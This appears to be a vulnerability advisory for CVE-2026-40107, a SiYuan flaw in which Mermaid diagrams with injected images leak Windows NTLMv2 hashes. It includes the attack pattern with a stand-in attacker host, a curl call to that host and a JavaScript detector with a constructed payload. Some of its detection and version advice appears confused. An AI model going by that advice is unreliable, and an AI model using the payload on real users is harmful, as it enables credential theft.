Platform: go
Component: github.com/siyuan-note/siyuan/kernel
Fixed in: 3.6.5
Fixed in: 0.0.0-20260407035653-2f416e5253f1
CVE-2026-40107 describes a Server-Side Request Forgery (SSRF) vulnerability discovered in the SiYuan Kernel, the core component of the SiYuan note-taking application. This vulnerability allows an attacker to craft malicious Mermaid diagrams that, when opened by a victim, can trigger the application to make unintended requests to arbitrary URLs. The vulnerability stems from insecure configuration of Mermaid.js within SiYuan, specifically the use of securityLevel: "loose" and htmlLabels: true, enabling the injection of SVG elements with protocol-relative URLs that resolve to UNC paths on Windows, potentially exposing NTLMv2 hashes.
The primary impact of CVE-2026-40107 is the potential for unauthorized access to internal resources and information disclosure. An attacker can embed a malicious Mermaid diagram within a SiYuan note. When a victim opens this note, the application will attempt to fetch the URL specified in the injected SVG <img> tag. On Windows systems, a protocol-relative URL (e.g., //attacker.com/image.png) is resolved as a UNC path (\\attacker.com\image.png). This triggers an SMB connection attempt, automatically sending the victim's NTLMv2 hash to the attacker's server. This can be used for credential theft and subsequent lateral movement within the network. The blast radius extends to any user of the SiYuan application who opens a malicious note, particularly those on Windows systems.
CVE-2026-40107 was publicly disclosed on 2026-04-10. There is currently no indication of active exploitation campaigns targeting this vulnerability. Public proof-of-concept (PoC) code is expected to emerge given the relatively straightforward nature of the exploit. The vulnerability is not currently listed on CISA KEV. The exploit leverages a similar pattern to other SSRF vulnerabilities where protocol-relative URLs are abused to bypass security controls.
Users of SiYuan who rely on Mermaid diagrams for note-taking and visualization are at risk. Environments with shared hosting or legacy Windows systems with weak SMB configurations are particularly vulnerable, as the automatic NTLMv2 hash transmission poses a significant threat.
• windows / supply-chain: Monitor PowerShell execution for suspicious URLs or SMB connections initiated by the SiYuan process. Use Windows Defender to search for alerts related to network connections to unusual domains or UNC paths.
Get-Process -Name SiYuan | Select-Object -ExpandProperty CommandLine | Select-String -Pattern '\\attacker.com'
• linux / server: Examine SiYuan's process logs for any unexpected outbound network connections. Use journalctl to filter for errors or warnings related to Mermaid.js or URL fetching (journalctl accepts a single -g pattern, so combine the terms in one regular expression).
journalctl -u siyuan -g 'error|warning'
• generic web: Monitor access logs for requests originating from the SiYuan client to unusual or attacker-controlled domains. Check response headers for unexpected content or redirects. Use curl to test for endpoint exposure.
curl -I https://attacker.com/image.png
Disclosure
Exploit status
EPSS: 0.06% (18th percentile)
CISA SSVC
The primary mitigation for CVE-2026-40107 is to upgrade SiYuan Kernel to version 0.0.0-20260407035653-2f416e5253f1 or later. This version includes a fix that properly sanitizes the SVG content, preventing the injection of malicious URLs. As a temporary workaround, consider disabling Mermaid.js support within SiYuan if upgrading is not immediately possible. While a WAF or proxy cannot directly prevent this vulnerability, they can be configured to block outbound SMB connections to suspicious UNC paths. Monitor network traffic for unusual SMB connections originating from SiYuan instances.
Update the Mermaid.js library to version 3.6.4 or higher to mitigate the vulnerability. Make sure `securityLevel: 'strict'` is configured and that `htmlLabels: true` is disabled, to prevent the injection of malicious code via Mermaid diagrams.
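To make the two settings concrete, here is an added JavaScript example (not SiYuan's or Mermaid's own code) that contrasts the weak and hardened configuration objects, and adds a pre-render check that flags protocol-relative URLs in diagram label markup, the pattern the advisory describes. It assumes a Mermaid-style `{ securityLevel, htmlLabels }` options object; the host name and diagram text are constructed placeholders.

```javascript
// Added example (not SiYuan's or Mermaid's own code): a pre-render check that
// applies the two settings from the advisory and flags protocol-relative URLs
// in diagram label markup. Config objects mirror the Mermaid initialize()
// options named on the page; host names and diagram text are constructed.

// The combination the advisory describes as vulnerable: label HTML is rendered
// and "loose" leaves tags in label text unencoded.
const weakMermaidConfig = { securityLevel: "loose", htmlLabels: true };

// The hardened combination the advisory recommends: "strict" encodes HTML tags
// in label text, and disabling htmlLabels removes the HTML label surface.
const hardenedMermaidConfig = { securityLevel: "strict", htmlLabels: false };

// True when a config has both recommended settings.
function isHardenedConfig(cfg) {
  return cfg.securityLevel === "strict" && cfg.htmlLabels !== true;
}

// Matches src / href / xlink:href attribute values that start with "//":
// the protocol-relative form that Windows resolves to a UNC path (\\host\...).
const PROTOCOL_RELATIVE_ATTR =
  /\b(?:xlink:)?(?:src|href)\s*=\s*["']?(\/\/[^"'\s>]+)/gi;

// Returns every protocol-relative URL found in attribute position in the
// diagram source. Mermaid link syntax such as 'click A href "https://..."'
// is not matched because its value does not start with "//".
function findProtocolRelativeUrls(diagramSource) {
  return Array.from(diagramSource.matchAll(PROTOCOL_RELATIVE_ATTR), (m) => m[1]);
}

// Combined assessment: configuration findings plus content findings. An empty
// array means the renderer config is hardened and nothing in the source was
// flagged; a caller can refuse to render (or log) on a non-empty result.
function checkDiagram(diagramSource, cfg) {
  const findings = [];
  if (cfg.securityLevel !== "strict") {
    findings.push(`securityLevel is "${cfg.securityLevel}", expected "strict"`);
  }
  if (cfg.htmlLabels === true) {
    findings.push("htmlLabels is enabled; label text may carry HTML/SVG markup");
  }
  for (const url of findProtocolRelativeUrls(diagramSource)) {
    findings.push(`protocol-relative URL in label markup: ${url}`);
  }
  return findings;
}

// Constructed diagram sources (placeholder host, not a real one).
const benignDiagram = `graph TD
  A[Start] --> B[Finish]`;

const suspiciousDiagram = `graph TD
  A["<img src='//placeholder.invalid/image.png'>"] --> B[Finish]`;

console.log(checkDiagram(benignDiagram, hardenedMermaidConfig)); // []
console.log(checkDiagram(suspiciousDiagram, weakMermaidConfig)); // three findings
```

The content check is deliberately independent of the configuration check: even with a hardened renderer, a note that carries protocol-relative references in label markup is worth logging, since the same source may later be opened by a client that still runs the weak settings.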
CVE-2026-40107 is a Server-Side Request Forgery (SSRF) vulnerability in SiYuan Kernel, allowing attackers to trigger arbitrary URL fetches via malicious Mermaid diagrams.
You are affected if you are using a version of SiYuan Kernel prior to 0.0.0-20260407035653-2f416e5253f1 and utilize Mermaid diagrams.
Upgrade SiYuan Kernel to version 0.0.0-20260407035653-2f416e5253f1 or later. Consider temporarily disabling Mermaid diagrams as a workaround.
There is currently no indication of active exploitation campaigns targeting CVE-2026-40107, but public proof-of-concept code is likely.
Refer to the SiYuan project's official release notes and security advisories for the most up-to-date information: [https://github.com/siyuan-note/siyuan/releases](https://github.com/siyuan-note/siyuan/releases)